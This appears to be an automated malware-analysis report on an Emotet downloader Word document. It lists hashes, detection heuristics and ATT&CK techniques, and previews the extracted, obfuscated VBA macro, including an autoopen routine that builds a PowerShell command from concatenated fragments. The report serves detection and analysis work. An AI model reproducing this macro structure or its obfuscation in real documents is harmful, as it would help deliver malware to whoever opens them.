Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 fb2baa745f5d1d2e…

MALICIOUS

Office (OLE)

242.1 KB Created: 2019-03-11 15:23:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: 605b3d0f13ad72d2dda3a571b42c54e4 SHA-1: ee53e6dbd3a09608b4efb7a3f5b5d5c4e2d27121 SHA-256: fb2baa745f5d1d2ef3e362764790f7afb13def5ad6c97d436e922a9475fbba16
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the VBA macro attempts to execute processes using WMI. The presence of an AutoOpen macro and the ClamAV detection for 'Doc.Downloader.Emotet-6888558-0' strongly suggest Emotet family activity. The VBA script, although heavily obfuscated, likely facilitates the download and execution of a secondary payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6888558-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6888558-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60436 bytes
SHA-256: 4a3809d36c9b357a8cdf02ee9c86d6a1d5bd62c0fdfbb065b9c6a31218bf2e0d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KCDAB1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YAoAcUA()
   Set fkXABw = wXAkAUQA
    If qAABkAGA = NQC1XcA Then
         rA1xDAx = CBool(331546950 - Round(CDQUAAAQ) * UDQ_AU * 199427170)
         zXGBAB_ = Chr(M4D_ADU)
         TAGkX1A = CDate(72203852 * 754263603)
         sUAQcAQD = Oct(qAkAQAA - Round(jAcwADGB))
End If
   Set GAADxAo = iBDCUBD
    If w4AoQX = dBoXCoQA Then
         pUxCGQ = CLng(962720796 - CDbl(tAGDAB) * jAABAQAB * 295043834)
         lGQAA4B = CInt(BABAxo)
         uZA44AB = Tan(326015531 * 99565947)
         fGDUDQx = CDate(b4ZXAXA - Sin(RQDDcUAB))
End If
   Set TAU_AZAA = IDADQBX
    If qQAA1AGA = IDx4AxA Then
         kDDUBDBQ = CInt(524473724 - ChrW(GADxAAD) * JAABAU1 * 152642215)
         DUUAAAAA = CInt(Y_AAAA)
         zGAAkABA = Rnd(668889659 * 239035900)
         pU1AA4 = Int(lDXDUU - CByte(aDAAB1AA))
End If
   Set wox4AG1A = bDAABD
    If w_UACZ = ocUw_UU Then
         FABAxDc = ChrW(274826799 - Chr(CwAGCCk_) * KCQAAA1 * 238332441)
         HADAZCAA = ChrB(V_AGAD)
         XAACAX = Log(402121482 * 156006925)
         WkAADxUU = Round(JcABQG - CByte(ooAcXcQG))
End If
   Set iCxUDo = VQ_QUUAZ
    If j4UAAkA = LAAAGw Then
         vCQAoGU = Rnd(197039317 - CSng(ZQU4AGZ) * P4XoDUQA * 86388918)
         pAxADBAA = Cos(BBAUAXU4)
         G_AAAUA_ = ChrB(240485264 * 91840547)
         WXAAQDA = Chr(kAc1ABXC - Sin(H1AQAx))
End If
   Set iXXxxGGU = MGcUADcA
    If UBAcAQDw = ZcwQDAAA Then
         B1QAABxB = Int(784761315 - CBool(s1ZADAw) * fAADAw_ * 205667607)
         JAAQQkQA = Int(bAABwAU)
         zQCG4k4 = Rnd(137375139 * 430664323)
         TAQAQAAQ = CStr(QwkACD - CByte(GAQAQA))
End If
   Set aQABAAB = jZAcU_Q
    If kAD_AkAQ = Zo_BCo Then
         lckAAAQ = Chr(560795357 - Log(CUQDAA) * QADZ1DQ * 784928056)
         KCDDcBA = ChrB(pAGCoxCA)
         V4BABBD = Round(246508817 * 216385499)
         TGAoDXwC = Tan(NQQABAk_ - Fix(h_ADxA))
End If
End Function
Sub autoopen()
On Error Resume Next
   Set RAAAXA4D = SCkAwGAc
    If GcZZxwU = IXAxBXB Then
         NAAAU4GU = Tan(836694526 - Round(uGXwB4) * qACXDA * 638859433)
         z1AAoAU = ChrB(k1ABAUxD)
         AB_wAAC = Hex(565900788 * 305512387)
         jAAkAQc = CDbl(M_4BADAc - Cos(KU1AQcZ))
End If
   Set loBQZBU = boUA1wwU
    If ODBCwZw = zoBCAUQA Then
         SxAkwBDA = Cos(874558623 - Int(UDD1Ako) * C1AAAAU * 925895404)
         ZAZAAUwA = Log(G4ADw4Q)
         m1AckAA = Fix(582030249 * 237791620)
         tAGc1AA = CSng(vXBwQ_ - Cos(DBGAC1Z4))
End If
nw_X4Ak (zoUQAx + "po" + lBoABA + "wershel" + tAUcCBAG + BkA_AXAD + uoAAAUAB + JZAXBD + qXGDXkQ + iw1BUB + IQBG1A + oDAAxA + tADAUAZG)
   Set zU1DB1XA = F1AQGU
    If RADDCXAB = mABAcAkC Then
         QQoAAAk = CDate(287115903 - Atn(X4AAkw) * mDDc1XA * 261735182)
         QwUUAA = CInt(uAwwAcG)
         H1kAAUQ = Int(213326584 * 317072643)
         YUBoAD = CByte(lAAUxBAA - Cos(CkAUAQC))
End If
   Set IAGAGCkx = WGx4D1B
    If LoAwADXX = MkBAXwkX Then
         LQZA_4AA = Fix(505935207 - Cos(OZAwAAZZ) * n_AoABA * 855163222)
         GkAQ_UwQ = Int(IGUAC4QA)
         jGxXA1 = Int(330729557 * 168683964)
         BXA1AA = ChrW(oQUAAUAD - Cos(vAAA4A))
End If
End Sub
Function cDAAAB()
   Set WAAAGcA = mUABAwCA
    If XAGZG1Q = aokAZCkB Then
         GAAB_U1 = Sqr(433732450 - Fix(lxAwCxAQ) * YkcAAk * 619340989)
         jGDQQG1k = ChrW(pUBADC)
         uQ_1DX = CLng(368504264 * 898157917)
         dBADA4_ = Oct(ZoBGAZQ - ChrB(jGAAAoA))
End If
   Set cAAAQQ = fAQQQAD
    If pAAGDU = hAXAA4 Then
         PAAAAAU = CByte(282795031 - Hex(fXBUwQC) * HQBXA14o * 367044481)
         jUAA_QA = CInt(JQAAcQA)
         wUoBGw = CSng(749044112 * 730934858)
         mAAx4wUo = Hex(zUAxUA - ChrB(nwAACAA))
End If
   Set vwD1UQ = ZCDAAkAA
    If EDAACGQ = d1owUUAQ Then
     
... (truncated)